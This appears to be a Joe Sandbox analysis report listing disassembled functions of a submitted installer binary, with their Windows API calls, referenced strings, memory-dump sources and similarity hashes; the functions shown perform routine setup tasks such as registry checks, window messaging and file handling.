                                                                                                            • Instruction Fuzzy Hash: 59119631B00A04AFDB11DFA6CD62A5FB7ADEB89705F10847ABC04D3652DB789E04CA54
                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
                                                                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403
                                                                                                            Strings
                                                                                                            • Failed to create DebugClientWnd, xrefs: 004563CC
                                                                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                            • API String ID: 3850602802-3720027226
                                                                                                            • Opcode ID: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                                                            • Instruction ID: 9b4fe9b07e62f64c95e3ed8797323406b80950c852a807cd7dd65319169fa691
                                                                                                            • Opcode Fuzzy Hash: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                                                            • Instruction Fuzzy Hash: 1111E3B06042506FD300AB699C81B5F7BA89B56309F45443BF984DF383D3798C18CBAE
                                                                                                            APIs
                                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                            • GetFocus.USER32 ref: 004771FF
                                                                                                            • GetKeyState.USER32(0000007A), ref: 00477211
                                                                                                            • WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FocusMessageStateTextWaitWindow
                                                                                                            • String ID: Wnd=$%x
                                                                                                            • API String ID: 1381870634-2927251529
                                                                                                            • Opcode ID: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                                                            • Instruction ID: 1bcd60996d2698ed373ebf422e897d28d135c5275452f214efeb8338eb806bda
                                                                                                            • Opcode Fuzzy Hash: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                                                            • Instruction Fuzzy Hash: A611CA30604204AFC701EFA9DC41ADE77F8EB49704B9184F6F418E3252D73C6D10CA6A
                                                                                                            APIs
                                                                                                            • FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$LocalSystem
                                                                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                            • API String ID: 1748579591-1013271723
                                                                                                            • Opcode ID: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                                                            • Instruction ID: 0ff0b3c23c5ed0256b313d7d525d52e9a24b5728abf6314cf281cf193483f13b
                                                                                                            • Opcode Fuzzy Hash: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                                                            • Instruction Fuzzy Hash: 4311F8A090C3909ED340DF2AC44432BBAE4AB89704F04892EF9D8D6381E779C948DB77
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen
                                                                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                            • API String ID: 47109696-2631785700
                                                                                                            • Opcode ID: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                                                            • Instruction ID: 2bdf3aef2c60deecc2fc1a5dc8a42cc53f0a1f71867dabe890c8ddf4abdcbedd
                                                                                                            • Opcode Fuzzy Hash: 26e598e2510fa9e4a6399a429d897fd92e9f9241c646caba1ec59660a343853d
                                                                                                            • Instruction Fuzzy Hash: 3AF0A4B17001109BDB10EB1AE845F5B628CDBD1316F20403FF581E7296CE7CDC06CA9A
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
                                                                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C
                                                                                                            Strings
                                                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 00481F46
                                                                                                            • CSDVersion, xrefs: 00481F70
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                            • API String ID: 3677997916-1910633163
                                                                                                            • Opcode ID: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                                                            • Instruction ID: c869957850822339a6d2b86bec0dd1f4db8a349efa053aa20552817ac18695c5
                                                                                                            • Opcode Fuzzy Hash: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                                                            • Instruction Fuzzy Hash: 94F01975E4020DAADF10EAD18C45BAF73BCAB04708F104967FB10E7290E779AA45CB5A
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                            • API String ID: 1646373207-4063490227
                                                                                                            • Opcode ID: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                                                            • Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
                                                                                                            • Opcode Fuzzy Hash: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                                                            • Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                                            • API String ID: 1646373207-260599015
                                                                                                            • Opcode ID: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                                                            • Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
                                                                                                            • Opcode Fuzzy Hash: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                                                            • Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                            • API String ID: 1646373207-834958232
                                                                                                            • Opcode ID: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                                                            • Instruction ID: 4607b44a290c0083fd8a3bbebdee3b5c85a8181a3f50ff176a2b10a78ee17b7d
                                                                                                            • Opcode Fuzzy Hash: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                                                            • Instruction Fuzzy Hash: 0BB012CA68170450CC1032F28C07E1F1C0C4C80769B1604373C00F10C3CF6CD800483E
                                                                                                            APIs
                                                                                                              • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                                              • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                            • API String ID: 2238633743-2683653824
                                                                                                            • Opcode ID: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                                                            • Instruction ID: dcd617acd20af11e442c32675adda2be3f923d80830e775180bb661fb25f4313
                                                                                                            • Opcode Fuzzy Hash: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                                                            • Instruction Fuzzy Hash: 67B092A0A80780A8DE10BFB3A84390B28248590B1AB20443B30207A093EB7C45145E6F
                                                                                                            APIs
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D), ref: 0047C3C0
                                                                                                            • FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D,00000000), ref: 0047C3DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2066263336-0
                                                                                                            • Opcode ID: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                                                            • Instruction ID: ee88cb3e7f5f0e7034babd07dab097b82f9cbcdb14299ae6248908863b530e43
                                                                                                            • Opcode Fuzzy Hash: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                                                            • Instruction Fuzzy Hash: 5981317090025DAFCF11DFA5CC91ADFBBB9EF49304F5084AAE808A7291D7399A46CF54
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
                                                                                                              • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
                                                                                                            • GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountErrorFileLastMoveTick
                                                                                                            • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                            • API String ID: 2406187244-2685451598
                                                                                                            • Opcode ID: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                                                            • Instruction ID: 473eb97c6ec8267434c8776fb474a14b66813a9beba34573b5150fcc090343b6
                                                                                                            • Opcode Fuzzy Hash: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                                                            • Instruction Fuzzy Hash: 79416370A002099FCB10EFA5D882AEE77B4EF89314F518537E504B7395D73C9A05CBA9
                                                                                                            APIs
                                                                                                            • GetDesktopWindow.USER32 ref: 00413D56
                                                                                                            • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                                              • Part of subcall function 00418ED0: 6F59C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
                                                                                                              • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
                                                                                                            • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CursorDesktopWindow$Show
                                                                                                            • String ID:
                                                                                                            • API String ID: 2074268717-0
                                                                                                            • Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                                                            • Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
                                                                                                            • Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                                                            • Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                                                            • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                                                            • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$FileMessageModuleName
                                                                                                            • String ID:
                                                                                                            • API String ID: 704749118-0
                                                                                                            • Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                                                            • Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
                                                                                                            • Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                                                            • Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767
                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
                                                                                                              • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
                                                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
                                                                                                              • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                                            • IsRectEmpty.USER32(?), ref: 0044E1A7
                                                                                                            • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 855768636-0
                                                                                                            • Opcode ID: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                                                            • Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
